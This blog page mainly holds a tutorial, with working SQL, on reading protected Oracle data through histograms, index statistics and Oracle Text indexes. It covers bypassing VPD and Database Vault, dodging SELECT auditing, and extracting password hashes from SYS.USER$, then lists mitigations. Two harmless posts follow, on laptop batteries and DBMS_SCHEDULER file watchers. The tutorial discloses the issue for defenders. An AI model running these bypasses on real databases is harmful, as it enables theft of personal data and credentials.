The Anti-Kyte

Oracle - for when it was like that when you got there

Horrible Histograms and Invidious Indexes – Exploits to by-pass Oracle Database Security – including VPD and Database Vault

Fri, 2020-11-20 10:55

This article is about how Indexes and Histograms may be used to view data to which a user does not ordinarily have access. It includes details of how these objects can be used to circumvent both Virtual Private Database and Database Vault restrictions.
If you want a serious and thorough exploration of these issues then I’d suggest you take a look at Alexander Kornbrust’s recent DOAG Presentation.

However, if you like your infosec to come with cute puppy pics, read on…

Meet Alexander Kornbrust. He’s an Information Security specialist with a particular focus on Oracle.

Having known Alex for many years, there are a couple of things about him that I find striking. Firstly, every time we have a conversation about the Oracle RDBMS, I learn something new. Secondly, in all these years, he hasn’t aged a day :

Alex has found some “interesting” behaviours inherent in Relational Databases in general and Oracle is no exception in this respect.

Before we get into that though, we need to meet the story’s main protagonist.

His name is Teddy. He’s done a bit of background research for the role and he thinks that remaining incognito would be a good starting point :

Have you got a false nose to go with these glasses ?

Truth be told, persuading him to do this ( in fact to do anything he’s supposed to) took some doing. In the end however, we overcame the human/canine communication barrier by employing the Esperanto of bribery. As a result, Teddy now has a large stockpile of dog biscuits. The relevance of this will become apparent shortly…

NOTE – I was able to run all of the code in this article on Oracle 18cXE running on CentOS 7.

Teddy just got a job at Lead the Way – a pet equipment company. He’s just been added to the Company’s HR system, which may well look rather familiar…

insert into employees( 
    employee_id, first_name, last_name, email, phone_number,
    hire_date, job_id, salary, manager_id, department_id)
values(
    employees_seq.nextval, 'Teddy', 'Dog', 'TDOG', '590.423.4570',
    to_date('20190226', 'YYYYMMDD'), 'IT_PROG', 2000, 103, 60)
/

Whilst he is only a lowly-paid member of the IT Department, he does have some relatively powerful privileges in order to look after the system :

grant create session, select_catalog_role to tdog identified by password_buried_in_the_garden;

Teddy’s privileges will change as we go through this post. For now though, they are as follows :

select privilege, 'System Privilege' as PRIVILEGE_TYPE from session_privs union
select role, 'Granted Role' from session_roles;

PRIVILEGE                      PRIVILEGE_TYPE  
------------------------------ ----------------
CREATE SESSION                 System Privilege
HS_ADMIN_SELECT_ROLE           Granted Role    
SELECT_CATALOG_ROLE            Granted Role    

This means that Teddy has no access to data in the application tables :

select *
from hr.locations;

ERROR at line 2:
ORA-01031: insufficient privileges

Actually, that’s not entirely true…

Accessing High/Low values via an index

As Teddy has SELECT_CATALOG_ROLE, he can confirm that there is actually a LOCATIONS table in the HR schema…

select object_type
from dba_objects
where owner = 'HR'
and object_name = 'LOCATIONS';

OBJECT_TYPE            
-----------------------
TABLE                  

…confirm which columns are in the locations table…

select column_name, data_type
from dba_tab_columns
where owner = 'HR'
and table_name = 'LOCATIONS';

COLUMN_NAME                    DATA_TYPE           
------------------------------ --------------------
LOCATION_ID                    NUMBER              
STREET_ADDRESS                 VARCHAR2            
POSTAL_CODE                    VARCHAR2            
CITY                           VARCHAR2            
STATE_PROVINCE                 VARCHAR2            
COUNTRY_ID                     CHAR     

…and which of those columns are indexed…

select index_name, column_name
from dba_ind_columns
where table_owner = 'HR'
and table_name = 'LOCATIONS';

INDEX_NAME                     COLUMN_NAME                   
------------------------------ ------------------------------
LOC_CITY_IX                    CITY                          
LOC_STATE_PROVINCE_IX          STATE_PROVINCE                
LOC_COUNTRY_IX                 COUNTRY_ID                    
LOC_ID_PK                      LOCATION_ID     

Which means that, for these indexed character columns, we can find at least two values – the column’s low and high values – simply by querying the optimizer statistics in the data dictionary…

with
    function raw_to_date(i_var in raw) return date as
        o_var date; 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
    function raw_to_number(i_var in raw) return number as
        o_var number; 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
    function raw_to_varchar2(i_var in raw) return varchar2 as
        o_var varchar2(32767); 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
select
    case substr(data_type,1,9)
        when 'VARCHAR2' then to_char(raw_to_varchar2(low_value))
    end as plain_text_lo_val,
    case substr(data_type,1,9)
        when 'VARCHAR2' then to_char(raw_to_varchar2(high_value))
    end as plain_text_hi_val
from dba_tab_columns
where table_name = 'LOCATIONS'
and column_name = 'CITY'
/

PLAIN_TEXT_LO_VAL    PLAIN_TEXT_HI_VAL   
-------------------- --------------------
Beijing              Whitehorse          

There’s a lot more data skulking around in other corners of the data dictionary…

Horrible histograms

Looking at the histograms generated by stats gathering jobs, we can find even more LOCATIONS data :

select column_name
from dba_histograms
where owner = 'HR'
and table_name = 'LOCATIONS'
group by column_name
having count(*) > 2;

COLUMN_NAME                   
------------------------------
COUNTRY_ID                    

As there are more than two rows for the LOCATIONS.COUNTRY_ID column in DBA_HISTOGRAMS, Teddy knows that histogram stats have been gathered on it.

As this column is actually a VARCHAR2, he can see the unencrypted COUNTRY_ID values simply by running :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'LOCATIONS'
and column_name = 'COUNTRY_ID'
/

ENDPOINT_ACTUAL_VALUE                                                                                                             
----------------------
AU                                                                                                                                
BR                                                                                                                                
CA                                                                                                                                
CH                                                                                                                                
CN                                                                                                                                
DE                                                                                                                                
IN                                                                                                                                
IT                                                                                                                                
JP                                                                                                                                
MX                                                                                                                                
NL                                                                                                                                
SG                                                                                                                                
UK                                                                                                                                
US                                                                                                                                

14 rows selected. 

Remember, all Teddy has done to access this information is to run a few queries against the data dictionary.

In fact, the statement that created the histogram we’ve just looked at is contained in one of the HR schema creation scripts – $ORACLE_HOME/demo/schema/human_resources/hr_analz.sql :

EXECUTE dbms_stats.gather_schema_stats( 
        'HR'                            ,       
        granularity => 'ALL'            ,       
        cascade => TRUE                 ,       
        block_sample => TRUE            );

Even if selects on the table are being audited, these queries on the data dictionary will not be picked up.

While this is all very interesting, Teddy has other plans. He wants to start monetizing his biscuit mountain and thinks that a mailing campaign would be just the job to generate sales. After all, it’s a pet equipment company, so at least some of his colleagues must be dog people. What he wants, therefore, is a list of email addresses…

Creating a histogram to bypass SELECT auditing

Teddy has passed his probation and now has an additional privilege :

grant analyze any to tdog;

Once he’s found the column that holds the data he’s interested in…

select column_name
from dba_tab_columns
where owner = 'HR'
and table_name = 'EMPLOYEES';

COLUMN_NAME         
--------------------
EMPLOYEE_ID
FIRST_NAME
LAST_NAME
EMAIL
PHONE_NUMBER
HIRE_DATE
JOB_ID
SALARY
COMMISSION_PCT
MANAGER_ID
DEPARTMENT_ID

11 rows selected. 

…he can check to see if a histogram already exists :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

ENDPOINT_ACTUAL_VALUE                   
----------------------------------------



2 rows selected. 

As there are only two rows, each with a null ENDPOINT_ACTUAL_VALUE, Teddy can infer that no histogram exists on this column. However, this is not a major problem as he can use his new privilege to generate one :

begin
    dbms_stats.gather_table_stats(
        ownname => 'HR',
        tabname => 'EMPLOYEES',
        method_opt => 'FOR COLUMNS EMAIL size 255');
end;
/

It’s worth remembering that gathering stats on a table will not trigger auditing of SELECT statements on the table.
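
For instance, even if the DBA had something like the following in place – a sketch using traditional object auditing syntax, assuming traditional (or mixed-mode) auditing is available; under pure Unified Auditing an audit policy would be used instead – Teddy’s call to DBMS_STATS and his subsequent dictionary queries would leave no trace in the audit trail for this table :

audit select on hr.employees by access;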

Now, he can access all of the EMPLOYEES.EMAIL values :

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';



ENDPOINT_ACTUAL_VALUE                   
----------------------------------------
ABANDA
ABULL
ACABRIO
AERRAZUR
AFRIPP
AHUNOLD
AHUTTON
AKHOO
AMCEWEN
AWALSH
BERNST
BEVERETT
CDAVIES
CJOHNSON
COLSEN
CVISHNEY

****SNIP****

SVOLLMAN
TFOX
TGATES
TJOLSON
TRAJS
VJONES
VPATABAL
WGIETZ
WSMITH
WTAYLOR

107 rows selected.

Indexes and Histograms vs Virtual Private Database

The concept of Virtual Private Databases (VPD) has been around for many years in Oracle. Essentially, VPDs restrict data access by adding a predicate to DML statements against specific tables.

There’s a brief explanation of how it all works here.

Before we go any further, let’s remove the histogram Teddy created on EMPLOYEES.EMAIL :

exec dbms_stats.gather_table_stats( ownname => 'HR', tabname => 'EMPLOYEES', method_opt => 'FOR COLUMNS EMAIL size 1');

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
                                                                                
                                                                                

2 rows selected. 

For the purposes of our story, we’ve taken a brutal yet effective approach to VPD implementation for the EMPLOYEES table.

Having adjusted HR’s privileges :

grant execute on dbms_rls to hr;

…we’ve created this function in the HR schema :

create or replace function dept_id_fn( i_schema user_users.username%type, i_table user_objects.object_name%type)
    return varchar2 is
begin
    return 'department_id = 60';
end dept_id_fn;
/

…and (as HR), created a policy for all SELECT statements on the table :

begin
    dbms_rls.add_policy(
        object_schema => 'HR', 
        object_name => 'EMPLOYEES', 
        policy_name => 'OWN_DEPT', 
        function_schema => 'HR', 
        policy_function => 'dept_id_fn', 
        statement_types => 'SELECT');
end;
/

The upshot of this is that even HR can now only select rows from the EMPLOYEES table that have a DEPARTMENT_ID of 60 :

select department_id, email
from employees;

DEPARTMENT_ID EMAIL                    
------------- -------------------------
           60 AHUNOLD                  
           60 BERNST                   
           60 DAUSTIN                  
           60 VPATABAL                 
           60 DLORENTZ                 
           60 TDOG                     

6 rows selected. 

Meanwhile, Teddy has now been granted access to the table :

grant select on hr.employees to tdog;

Bypassing VPD with a Histogram

Like HR, Teddy can only see the six Department 60 records in EMPLOYEES :

select department_id, count(*)
from hr.employees
group by department_id;

DEPARTMENT_ID   COUNT(*)
------------- ----------
           60          6

However, he can still use the histogram trick to view all of the email addresses :

exec dbms_stats.gather_table_stats( 
    ownname => 'HR', 
    tabname => 'EMPLOYEES', 
    method_opt => 'FOR COLUMNS EMAIL size 255');

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
***snip***

TFOX                                                                            
TGATES                                                                          
TJOLSON                                                                         
TRAJS                                                                           
VJONES                                                                          
VPATABAL                                                                        
WGIETZ                                                                          
WSMITH                                                                          
WTAYLOR                                                                         

108 rows selected. 

Bypassing VPD with a fulltext index

Histograms are not the only dictionary object that can be used to circumvent VPD policies.

Let’s say that Teddy (TDOG, as he now insists on being called) has the following additional privileges :

grant create table, create any index to tdog;
alter user tdog quota unlimited on users;

He could do the following…

create index tdog.email_idx on hr.employees(email) 
    indextype is ctxsys.context;

This statement uses Oracle Text to create an index on HR.EMPLOYEES.EMAIL.

The index itself is owned by TDOG. Teddy can then query the index, the creation of which has by-passed the VPD policy on the table :

select token_text
from dr$email_idx$i
/

TOKEN_TEXT                                                                      
***snip***
TFOX                                                                            
TGATES                                                                          
TJOLSON                                                                         
TRAJS                                                                           
VJONES                                                                          
VPATABAL                                                                        
WGIETZ                                                                          
WSMITH                                                                          
WTAYLOR                                                                         

108 rows selected.

So, we can conclude that data is visible via histograms and indexes, even when it is otherwise protected by a VPD policy.

Incidentally, it’s worth noting that this applies even if the index or histogram in question was created prior to the implementation of the VPD policy.

For example…

Bypassing VPD to access high and low values in a pre-existing index

Teddy can see values outside those allowed by the VPD policy simply by looking at columns with pre-existing indexes. For example, the EMPLOYEES.EMAIL column already has an index :

select index_name
from dba_ind_columns
where table_owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL';

INDEX_NAME                    
------------------------------
EMP_EMAIL_UK


…which Teddy can now take advantage of as we’ve seen previously :

with
    function raw_to_varchar2(i_var in raw) return varchar2 as
        o_var varchar2(32767); 
    begin 
        dbms_stats.convert_raw_value(i_var,o_var); 
        return o_var; 
    end;
select
    case substr(data_type,1,9)
        when 'VARCHAR2' then to_char(raw_to_varchar2(low_value))
    end as plain_text_lo_val,
    case substr(data_type,1,9)
        when 'VARCHAR2' then to_char(raw_to_varchar2(high_value))
    end as plain_text_hi_val
from dba_tab_columns
where table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/


PLAIN_TEXT_LO_VAL                   PLAIN_TEXT_HI_VAL                  
----------------------------------- -----------------------------------
ABANDA                              WTAYLOR                            

Breaking into the Oracle Database Vault

The DBA at Lead the Way is fed up with all the spam she’s been getting about cheap dog biscuits. Apart from anything else, she’s a cat person.

Therefore, she’s decided to step up the data security by replacing the Virtual Private Database with an Oracle Database Vault Realm for the HR schema :

conn c##dbv_owner@xepdb1


begin
    DBMS_MACADM.CREATE_REALM (
    realm_name => 'HR Realm',
    description => 'Human Resources - Right-sizing your future',
    enabled => DBMS_MACUTL.G_YES,
    audit_options => DBMS_MACUTL.G_REALM_AUDIT_FAIL,
    realm_type => 1); 
end; 
/

begin
    DBMS_MACADM.ADD_OBJECT_TO_REALM(
    realm_name => 'HR Realm',
    object_owner => 'HR',
    object_name => '%',
    object_type => 'TABLE'); 
end; 
/

begin
    DBMS_MACADM.ADD_AUTH_TO_REALM(
        realm_name => 'HR Realm',
        grantee => 'HR',
        auth_options => DBMS_MACUTL.G_REALM_AUTH_OWNER); 
end;
/

As a result of this, HR can still see its own tables, but no-one else can.

Even connecting as SYSDBA doesn’t help :

conn sys@xepdb1 as sysdba
Password? (**************?) ************
Connected.
SQL> select count(*) from hr.employees;

select count(*) from hr.employees
                        *
ERROR at line 1:
ORA-01031: insufficient privileges

Furthermore, a histogram won’t help in this instance, as all of the values show up in DBA_HISTOGRAMS as null :

begin
    dbms_stats.gather_table_stats(
        ownname => 'HR',
        tabname => 'EMPLOYEES',
        method_opt => 'FOR COLUMNS EMAIL size 255');
end;
/


PL/SQL procedure successfully completed.

select endpoint_actual_value
from dba_histograms
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
                                                                                
                                                                                
***snip***                                                                                
                                                                                
                                                                                
108 rows selected. 

According to popular culture at the moment, if you’re going to crack a vault, you will need Ray Winstone and some mates armed with bus passes and an industrial drill (other ageing cockney geezers are available).

Fortunately for us, the same can be achieved by a cheeky chappie with a database account.

Taking a closer look at the source code for DBA_TAB_HISTOGRAMS – the data dictionary view pointed to by the DBA_HISTOGRAMS public synonym – we can see that it uses the following line to enforce the Data Vault restrictions :

sys_op_dv_check(o.name,o.owner#)= 1

Let’s get the view query and change all occurrences of this line to :

sys_op_dv_check(o.name,o.owner#)!= 1

The resulting query looks like this :

with cheeky_chappie_histos as
(
    select /*+ ordered */ u.name as owner,
           o.name as table_name,
           decode(bitand(c.property,1),1,a.name,c.name) as column_name,
           h.bucket as endpoint_number,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.endpoint
               else
                   null
           end as endpoint_value,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   case
                       when h.epvalue is not null then
                           epvalue
                       else
                           dbms_stats.conv_raw(h.epvalue_raw,c.type#)
                   end
               else
                   null
           end as endpoint_actual_value,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.epvalue_raw
               else
                   null
           end as endpoint_actual_value_raw,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.ep_repeat_count
               else
                   null
           end as endpoint_repeat_count,
           'SHARED' as scope
    from sys.user$            u,
         sys.obj$             o,
         sys.col$             c,
         sys."_HISTGRM_DEC"   h,
         sys.attrcol$         a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           0,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.minimum
               else
                   null
           end,
           null,
           null,
           0,
           'SHARED'
    from sys.user$              u,
         sys.obj$               o,
         sys.col$               c,
         sys."_HIST_HEAD_DEC"   h,
         sys.attrcol$           a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and h.row_cnt = 0 and h.distcnt > 0 and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           1,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.maximum
               else
                   null
           end,
           null,
           null,
           0,
           'SHARED'
    from sys.user$              u,
         sys.obj$               o,
         sys.col$               c,
         sys."_HIST_HEAD_DEC"   h,
         sys.attrcol$           a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj# and c.intcol# = h.intcol# and(o.type# in(
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and h.row_cnt = 0 and h.distcnt > 0 and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
    union all
    select /*+ ordered */ 'SYS',
           ft.kqftanam,
           c.kqfconam,
           h.bucket,
           h.endpoint,
           case
               when h.epvalue is not null then
                   epvalue
               else
                   dbms_stats.conv_raw(h.epvalue_raw,c.kqfcodty)
           end,
           h.epvalue_raw,
           h.ep_repeat_count,
           'SHARED'
    from sys.x$kqfta          ft,
         sys.fixed_obj$       fobj,
         sys.x$kqfco          c,
         sys."_HISTGRM_DEC"   h
    where ft.kqftaobj = fobj.obj# and c.kqfcotob = ft.kqftaobj and h.obj# = ft.kqftaobj and h.intcol# = c.kqfcocno
  /*
   * if fobj and st are not in sync (happens when db open read only
   * after upgrade), do not display stats.
   */ and ft.kqftaver = fobj.timestamp - to_date('01-01-1991','DD-MM-YYYY')
    union all
    select /*+ ordered */ u.name,
           o.name,
           decode(bitand(c.property,1),1,a.name,c.name),
           h.bucket_kxttst_hs,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.endpoint_kxttst_hs
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   dbms_stats.conv_raw(h.epvalue_raw_kxttst_hs,c.type#)
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.epvalue_raw_kxttst_hs
               else
                   null
           end,
           case
               when sys_op_dv_check(o.name,o.owner#)!= 1 then
                   h.ep_repeat_count_kxttst_hs
               else
                   null
           end,
           'SESSION'
    from sys.user$         u,
         sys.obj$          o,
         sys.col$          c,
         sys.x$kxttstehs   h,
         sys.attrcol$      a
    where o.obj# = c.obj# and o.owner# = u.user# and c.obj# = h.obj#_kxttst_hs and c.intcol# = h.intcol#_kxttst_hs and(o.type# in
    (
        3,
        4
    )                                     /* cluster, view */or(o.type# = 2     /* tables, excluding iot - overflow and nested tables */ and not exists(
        select null
        from sys.tab$ t
        where t.obj# = o.obj# and(bitand(t.property,512)= 512 or bitand(t.property,8192)= 8192)
    )))and c.obj# = a.obj#(+)and c.intcol# = a.intcol#(+)
)
select *
from cheeky_chappie_histos 
where owner = 'HR'
and table_name = 'EMPLOYEES'
and column_name = 'EMAIL'
/

…and returns the actual values in the histogram :

ENDPOINT_ACTUAL_VALUE                                                           
--------------------------------------------------------------------------------
ABANDA                                                                          
ABULL                                                                           
ACABRIO                                                                         
AERRAZUR                                                                        
AFRIPP                                                                          
AHUNOLD                                                                         
AHUTTON                                                                         
AKHOO                                                                           
AMCEWEN                                                                         
AWALSH                                                                          
BERNST               

***SNIP***


108 rows selected. 

Reading Oracle Password Hashes from a Histogram

Before we wrap things up, there is one final exploit to examine.

Connected to the database as SYSTEM, we have no access to the SYS.USER$ table, which holds the password hashes in the SPARE4 column :

select spare4
from sys.user$
/

ERROR at line 2:
ORA-01031: insufficient privileges

However, SYSTEM has the ANALYZE ANY DICTIONARY privilege. Therefore, we can do this :

begin
    dbms_stats.gather_table_stats(
        ownname => 'SYS',
        tabname => 'USER$',
        method_opt => 'FOR COLUMNS SPARE4 size 255');
end;
/

…which now makes the password hashes available via the histogram :

select endpoint_actual_value
from dba_histograms
where owner = 'SYS'
and table_name = 'USER$'
and column_name = 'SPARE4'
/

ENDPOINT_ACTUAL_VALUE                   
----------------------------------------

****Loads of password hashes****

Mitigations

So, what can our long-suffering DBA do to avoid becoming knee-deep in unwanted doggy treats ?

First of all, she needs to consider that, whilst the above examples have been generated on 18c, other releases may also be affected. She would need to verify this on whatever version and edition she is currently running.
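
For example, the version and edition banner is only a query away :

select banner
from v$version
/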

Oracle are constantly working to provide fixes for vulnerabilities, so timely application of Oracle Critical Patch Updates should remain a priority.
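
The patches already applied to the database can be reviewed via DBA_REGISTRY_SQLPATCH (available from 12c onwards) :

select patch_id, description, action, status, action_time
from dba_registry_sqlpatch
order by action_time
/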

It should be noted that CPUs are not provided for Express Edition databases. Therefore, consideration should be given to what audience is appropriate for an application running on this database edition.

Every table for which auditing is enabled for select statements should have CREATE INDEX statements audited as well. Under normal circumstances, this activity should be rare and is therefore unlikely to flood the audit trail with a large number of additional entries.
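
Using traditional object auditing syntax as a sketch (a Unified Audit policy could achieve the same effect), that might mean adding the following alongside an existing SELECT audit on the table :

-- the INDEX object audit option picks up CREATE INDEX statements against the table
audit index on hr.employees by access;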

Keeping track of which schemas have the privileges mentioned here would be useful. Equally useful would be to keep track of who can connect to the database using those schemas.

To recap, the main privileges (and role) in question are :

  • ANALYZE ANY
  • ANALYZE ANY DICTIONARY
  • CREATE ANY INDEX
  • SELECT_CATALOG_ROLE
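
A starting point for that tracking might be a query along these lines – a sketch, which doesn’t follow grants made via intermediate roles :

select grantee, privilege
from dba_sys_privs
where privilege in ('ANALYZE ANY', 'ANALYZE ANY DICTIONARY', 'CREATE ANY INDEX')
union all
select grantee, granted_role
from dba_role_privs
where granted_role = 'SELECT_CATALOG_ROLE'
order by 1, 2
/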

Some data warehouse environments have bind variable peeking disabled, in which case the optimizer will not use histograms for statements that use bind variables. You can check whether this applies to you by seeing whether the _optim_peek_user_binds parameter has been set :

select value
from v$parameter
where name = '_optim_peek_user_binds'
/

If the value is set to ‘FALSE’ then bind variable peeking is disabled and you can consider clearing down any histograms on application tables.
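
Note that, like most underscore parameters, _optim_peek_user_binds will only appear in V$PARAMETER if it has been explicitly set. To see its effective value regardless, you can (as SYS) query the underlying x$ views – a sketch :

select i.ksppinm as name, v.ksppstvl as value
from x$ksppi i
inner join x$ksppcv v
    on i.indx = v.indx
where i.ksppinm = '_optim_peek_user_binds'
/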

NOTE – as this is an underscore parameter and thus undocumented, you should check to make sure the above still applies to the Oracle version that you are currently running.

Acknowledgements

The brains behind this particular post belong to the aforementioned Alexander Kornbrust. I continue to be awed by his wonderfully devious mind when it comes to all things Oracle. Teddy doesn’t agree, but he’s just sulking because Alex wouldn’t buy any dog biscuits.

This Oracle Base article on Virtual Private Databases by Tim Hall was helpful, as was this article on the same subject by Saurabh Gupta.

Of course, sometimes you just need to read the manual and my thanks goes again to the nameless Oracle Document Elves who produced the Getting Started with Database Vault Guide.

Teddy hopes that all of this has at least given you paws for thought. Oh, and would you like to buy some biscuits ?

Assaulting my Battery – Myths and Legends about looking after a laptop battery.

Mon, 2020-10-26 16:26

I’m not a hardware specialist, but I’m not averse to prizing open a laptop case occasionally when the need arises. Most of the time.
This, however, was an exception. This is one view of my XPS13 that I never wanted to see :

What brought me to this point was the untimely demise of the battery.
What follows is not a blow-by-blow account of how I changed the battery, with all of the attendant nervousness that practically everything I was looking at was rather expensive and no doubt quite important.
Incidentally, if you are looking for that sort of thing then there are several helpful videos available, like this one, for example.
Rather it is an exploration of some of the advice around about ensuring your battery has a long and happy life. Specifically, it is an attempt to divine which advice is still relevant to the Lithium Ion (Li-Ion) Polymer batteries of the sort that power modern laptops…

Recharge Cycles

The expected life of a battery (i.e. how long before it wears out, not time between recharges) is measured in recharge cycles.
Fully charging a battery from 0% power to 100% is one cycle.
Usually, a laptop battery will be charged from a point before it’s been completely drained. This type of charge corresponds to part of a charge cycle.
For example, charging a battery from 20% to full will be considered as 0.8 of a cycle.
Looking at the spec for my machine, I can see that the battery is expected to last 300 cycles.

Battery “memory”

This phenomenon is where a battery “forgets” how much charge it can hold and needs to be reminded by being completely drained and then fully recharged.
Whilst this may have been true of some of the old nickel-metal hydride (NiMH) batteries, it is certainly not the case for the modern Li-Ion variety.

Overcharging

Once again, it may have been good practice in the past to disconnect the charger once the battery was fully charged. These days however, it does not appear to be the case.
For my particular machine, this question is directly addressed in an FAQ on Dell’s website :

“Can a Dell battery be overcharged ?
No, Dell laptops are designed to stop charging the battery when it reaches full charge. Once the battery is fully charged, the Dell laptop will continue to use power from the AC adapter.”

Monitoring Battery Health in Linux

There are battery monitors available whichever Linux desktop you happen to be using. If you prefer a command line tool then acpi should do the job.
Running this for my old, failing battery, output such as this wouldn’t be unusual :

acpi -ib
Battery 0: Discharging, 47%, 03:47:12 remaining
Battery 0: design capacity 7894 mAh, last full capacity 6327 mAh = 80%


The “last full capacity” reading here is an indicator that this battery has seen better days.

In contrast, the new battery looks rather more healthy :

acpi -bi
Battery 0: Discharging, 94%, 10:14:24 remaining
Battery 0: design capacity 7894 mAh, last full capacity 7894 mAh = 100%

So, how long should my battery last ?

As ever, it depends.
My own experience with the XPS13 was that 300 cycles lasted around 3 years.
Factors affecting the lifespan (in terms of elapsed time) would include how often you use the laptop on battery as opposed to AC power, and how hard you make it work relative to the system resources (CPU, RAM, disk) at its disposal.
When all is said and done, it seems like 3 years is probably a reasonable lifespan, given how I use my machine.
I don’t think I’ll be making too many changes to the way I use my battery.

DBMS_SCHEDULER – Fiddling with File Watchers

Wed, 2020-09-30 13:56

I recently updated my blog profile picture. Let’s face it, it was about time. The old one was taken 14 years ago.
This time, I thought I’d go for a contemporary portrait, which has the added benefit of being less likely to frighten animals and small children.
Unfortunately, it is also crying out for a caption :

Just popping into the bank. Keep the engine running

One or two alternative captions may well crop up in the following paragraphs.
Primarily though, I’ll be talking about the file watcher capabilities of DBMS_SCHEDULER.
Introduced in 11g, it enables developers to trigger actions when a file arrives without having to leave the comfort of their database.
There are a few moving parts and getting them to work together can take a bit of, well, fiddling.
Specifically, we’ll be looking at :

  • configuring the frequency at which filewatchers are run
  • creating a credential to use for file watching
  • creating a file watcher to determine when a file has arrived
  • creating a job for the file watcher to execute
  • adding a program so that we can get some information about the file
  • getting the filewatcher to wait for a large file transfer to complete

Before we get into all of that, we need to have a quick chat about environments…

Don’t try this at home

More specifically, don’t try this on Oracle 18c Express Edition.
The examples that follow have been tested on Oracle Enterprise Edition 12cR2 ( 12.2.0.1.0) running on Oracle Linux 7.3. I would normally run something like this on Oracle 18cXE. However, Express Edition is missing one of the components required for the File Watcher mechanism to work, namely the DBMS_ISCHED.FILE_WATCH_JOB procedure.
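
If you want to check whether the procedure is present in your own environment, a quick sanity check is :

select procedure_name
from dba_procedures
where owner = 'SYS'
and object_name = 'DBMS_ISCHED'
and procedure_name = 'FILE_WATCH_JOB'
/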

Finding and Configuring File Watcher settings

It’s probably worth taking a whistle-stop tour through the data dictionary views that provide some detail about how Oracle’s file watcher functionality hangs together.

Let’s start with the main scheduler job itself :

select program_owner, program_name, schedule_name, 
comments
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/

PROGRAM_OWNER   PROGRAM_NAME         SCHEDULE_NAME             COMMENTS                      
--------------- -------------------- ------------------------- ------------------------------
SYS             FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE     File watcher job              

We can see that the job is associated with both a Program and a Schedule.

If we look at the program, we can find out more details about what Oracle runs under the covers when a file watcher is initiated :

select program_type, program_action, comments
from dba_scheduler_programs
where owner = 'SYS'
and program_name = 'FILE_WATCHER_PROGRAM'
/

PROGRAM_TYPE         PROGRAM_ACTION                 COMMENTS                      
-------------------- ------------------------------ ------------------------------
STORED_PROCEDURE     dbms_isched.file_watch_job     File Watcher program          

Of more immediate interest is the schedule, which will tell us how often a filewatcher will run :

select schedule_type, repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

SCHEDULE_TYPE        REPEAT_INTERVAL               
-------------------- ------------------------------
CALENDAR             freq=minutely;interval=10      

What this means is that the filewatcher will check every 10 minutes to see if any file it’s looking for has arrived since it last checked.
Actually, what it means is that the filewatcher will check to see if a file it’s looking for exists and has a timestamp later than the last time it checked.
This distinction will become more relevant when we start testing. Speaking of which, testing will be rather less tedious if we can make the filewatcher run more regularly.

Therefore, I’m going to set it to run every minute.
To achieve this, I need to connect as SYSDBA and run…

alter session set container = pdb1;

begin
    dbms_scheduler.set_attribute(  
        name => 'file_watcher_schedule',
        attribute => 'repeat_interval',
        value => 'freq=minutely;interval=1');
end;
/

…where pdb1 is the name of the pluggable database you’re working in.

If we check again we should see that the FILE_WATCHER_SCHEDULE now reflects the new repeat_interval :

select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

REPEAT_INTERVAL               
------------------------------
freq=minutely;interval=1     

Cautious Credential Creation

We’re going to need access to an OS account that can read the files as they come in.
